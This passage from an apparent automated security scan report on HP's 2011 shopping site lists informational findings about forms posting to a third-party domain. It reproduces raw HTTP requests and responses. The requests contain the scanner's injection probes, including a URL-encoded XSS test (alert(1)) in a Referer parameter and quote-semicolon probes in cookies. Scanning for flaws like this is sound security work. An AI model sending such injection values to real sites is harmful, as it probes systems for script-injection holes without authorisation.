6.7. http://www.shopping.hp.com/webapp/shopping/product_comparison.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_comparison.do

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Request

POST /webapp/shopping/product_comparison.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 152
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData=549e5%2527%253balert%25281%2529%252f%252f9d266d5f0bd
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; prop12=r602; s_var_20=re_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%2C%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374381'%5D%5D; ljumpstack=%5B%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374382'%5D%5D; hpshopping=1&user_id=mlkpgtuW3gh8MCnpuVDWeQyYm2vi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777709; hpcompc_usen=cartExists=true; EMID=; s_depth=28; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Apdp%3Adesktops%3Arts_desktops%3Ahp%20pavilion%20p7-1020%20desktop%20pc; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Apdp%25253Adesktops%25253Arts_desktops%25253Ahp%252520pavilion%252520p7-1020%252520desktop%252520pc%2526pidt%253D1%2526oid%253DSimilar%252520priced%252520items%2526oidt%253D3%2526ot%253DSUBMIT%26hphqhhomktg%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

PROD_LIST=QP767AA%23ABA%7CBV704AA%23ABA&landing=desktops&category=p7xt_series&lanAttr=&subcat1=rts&storeName=computer_store&compare=Similar+priced+items

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:28:53 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:28:54 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 284317


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!--
...[SNIP]...
<div style="margin-bottom:-10px;margin-top:3px;margin-left:0px">
               <form name="SALES_CALLBACK" id="SALES_CALLBACK" action="https://suth.ehosts.net/NetAgent/HPCallBackLogin.aspx?ROUTEIDENT=C2C%20Product%20Compare" method="post">
<input type="hidden" name="Prod_List" value=""/>
...[SNIP]...

6.8. http://www.shopping.hp.com/webapp/shopping/product_detail.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:08:15 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:08:16 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:08:16 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 227618

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
<div style="margin-bottom:-10px;margin-top:3px;margin-left:0px">
               <form name="SALES_CALLBACK" id="SALES_CALLBACK" action="https://suth.ehosts.net/NetAgent/HPCallBackLogin.aspx?ROUTEIDENT=C2C%20Television%20PDP" method="post">
<input type="hidden" name="Prod_List" value=""/>
...[SNIP]...

6.9. http://www.shopping.hp.com/webapp/shopping/series_can.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/series_can.do

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Request

GET /webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=All-in-One+PCs&jumpid=in_R329_prodexp/hhoslp/psg/desktops/All-in-One_PCs HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; HP_EBUS=true; hpcompc_usen=cartExists=true; EMID=; s_depth=23; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Anotebook%3Alaptops%20and%20mini%20pcs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%5D; s_cc=true; HP_EBUS_HP_CLICKS=4x19x11159; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Acs%25253Adesktops%2526pidt%253D1%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fseries_can.do_storeName%25253Dcomputer_store%252526landing%25253Ddesktops%252526a1%25253DCategory%252526v1%25253DAll-in-On_5%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:49 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:50 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 168108


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
<div style="margin-bottom:-10px;margin-top:3px;margin-left:0px">
               <form name="SALES_CALLBACK" id="SALES_CALLBACK" action="https://suth.ehosts.net/NetAgent/HPCallBackLogin.aspx?ROUTEIDENT=C2C%20Series%20CAN%20Computers" method="post">
<input type="hidden" name="Prod_List" value=""/>
...[SNIP]...

6.10. http://www.shopping.hp.com/webapp/shopping/store_access.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/store_access.do

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Request

GET /webapp/shopping/store_access.do?product_code=CN731A%23B1H&template_type=product_detail&jumpid=re_r602_dp_bg7_na_ipg_mar11_psaioA_pseaio1 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hp.com/united-states/consumer/digital_photography/buying_guides/aio.html?jumpid=reg_R1002_USEN
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; hpcompc_usen=cartExists=true; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Aproductadvisor%3Adesktops; prop12=r602; EMID=; s_depth=26; s_cc=true; HP_EBUS_HP_CLICKS=4x20x11244; s_sq=hphqglobal%2Chphqna%2Chphqhhomktg%2Chphqhhorollup%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:18:10 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=CN731A%23B1H%7CBV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7C0%7CCTO&home_slot_1_category=0%7C0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7C0%7CGS&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:18:11 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:18:11 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 222092

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
<div style="margin-bottom:-10px;margin-top:3px;margin-left:0px">
               <form name="SALES_CALLBACK" id="SALES_CALLBACK" action="https://suth.ehosts.net/NetAgent/HPCallBackLogin.aspx?ROUTEIDENT=C2C%20Television%20PDP" method="post">
<input type="hidden" name="Prod_List" value=""/>
...[SNIP]...

6.11. http://www.shopping.hp.com/webapp/shopping/store_access.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/store_access.do

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Request

GET /webapp/shopping/store_access.do?template_type=series_detail&category=desktops&series_name=p7xt_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home4923e'%3b1cd62d1ca9e
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; hpshopping=1&user_id=mlkqgtqf2Qt7MiHjv1bYeQeXlmvi; hpcompc_usen=cartExists=false; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e'%3B1cd62d1ca9e; hp_cust_seg_sel=HHO; gpv_pN=no%20value; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%5D; lang=en-us; cc=us; prop12=r602; EMID=; s_depth=14; s_cc=true; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; HP_EBUS_HP_CLICKS=4x12x2345; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fdesktops%25253BHHOJSID%25253DHWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182%25253Fjumpid_t%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Flateralnav_desktops_home4923e'%2525253b1cd62d1ca9e%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fstore_access.do_template_type%25253Dseries_detail%252526category%25253Ddesktops%252526series_name%25253Dp7xt_s_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26hphqhhomktg%3D%2526pid%253Dhho%25257CEC%25257Cus%25257Cen%25257CFlash%252520%25253A%252520Main%252520%25253A%252520%252520Whats%252520hot%252520%25253A%252520Feature%2525201%252520%25253A%252520HP%252520Coolsense%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fh71036.www7.hp.com%25252Fhho%25252Fus%25252Fen%25252Fpclc%25252Farticles%25252Fcoolsense-technology.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:00:03 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkjg92V0Q14NS%2FivlvfcASe0ic%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; expires=Friday, 20-Jan-2012 01:00:03 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 01:00:03 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 241316


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
<div style="margin-bottom:-10px;margin-top:3px;margin-left:0px">
               <form name="SALES_CALLBACK" id="SALES_CALLBACK" action="https://suth.ehosts.net/NetAgent/HPCallBackLogin.aspx?ROUTEIDENT=C2C%20Series%20Detail%20Computers" method="post">
<input type="hidden" name="Prod_List" value=""/>
...[SNIP]...

7. Cross-domain Referer leakage  previous  next
There are 18 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

